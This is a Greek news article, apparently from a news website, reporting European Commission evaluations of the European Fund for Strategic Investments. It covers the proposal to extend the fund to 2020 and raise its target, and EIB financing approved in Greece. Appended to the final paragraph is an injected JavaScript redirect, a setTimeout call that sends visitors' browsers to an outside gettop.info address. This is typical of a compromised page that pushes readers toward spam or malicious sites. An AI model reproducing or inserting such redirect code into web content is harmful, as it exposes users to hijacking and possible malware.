Κομισιόν: Στοιχεία για την ενίσχυση του Ευρωπαϊκού Ταμείου Στρατηγικών Επενδύσεων

0
5

 

Τα στοιχεία για την έως τώρα συνεισφορά του Ευρωπαϊκού Ταμείου Στρατηγικών Επενδύσεων στην τόνωση της ανάπτυξης στην ΕΕ παρουσίασε η Ευρωπαϊκή Επιτροπή.

Τα στοιχεία αυτά προέρχονται από τρεις αξιολογήσεις, της Επιτροπής, της ΕΤΕπ και μια ανεξάρτητη, της παγκόσμιας εταιρείας παροχής λογιστικών υπηρεσιών EY, ενώ στόχο έχουν να στηρίξουν την πρόταση της Επιτροπής προς το Συμβούλιο για διπλασιασμό της διάρκειας και των κονδυλίων του ΕΤΣΕ.

Στις 14 Σεπτεμβρίου ο κ. Γιούνκερ σε ομιλία του για την κατάσταση της Ένωσης απηύθυνε τη συγκκριμένη πρόταση για την παράταση σε πρώτη φάση, της διάρκειας του Σχεδίου έως το τέλος του 2020 και την αύξηση του συνολικού επενδυτικού στόχου από 315 δισεκατομμύρια ευρώ σε τουλάχιστον μισό τρισεκατομμύριο.

Η πρόταση επικεντρώνεται ήδη περισσότερο στις εισφορές του ιδιωτικού τομέα και, επιπρόσθετα, στην παράλληλη ενίσχυση της διαφάνειας στην επιλογή των έργων.

Σύμφωνα με στοιχεία της Κομισιόν, τα έργα που έχει εγκρίνει η ΕΤΕπ στο πλαίσιο του ΕΤΣΕ έχουν κινητοποιήσει επενδύσεις συνολικού ύψους 154 δισεκατομμυρίων ευρώ στα 27 κράτη-μέλη και υποστηρίζουν σχεδόν 380.000 ΜΜΕ.

Στην Ελλάδα, στο πλαίσιο του «πακέτου Γιούνκερ» η Ευρωπαϊκή Τράπεζα Επενδύσεων έχει εγκρίνει εννιά πράξεις, τόσο για έργα υποδομής όσο και για συμφωνίες χρηματοδότησης μικρομεσαίων επιχειρήσεων με ενδιάμεσους φορείς, με συνολική χρηματοδότηση ύψους 897 εκατ. ευρώ. Αυτές οι πράξεις αναμένεται να οδηγήσουν σε συνολικές επενδύσεις ανερχόμενες σε 2,36 δισ. ευρώ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here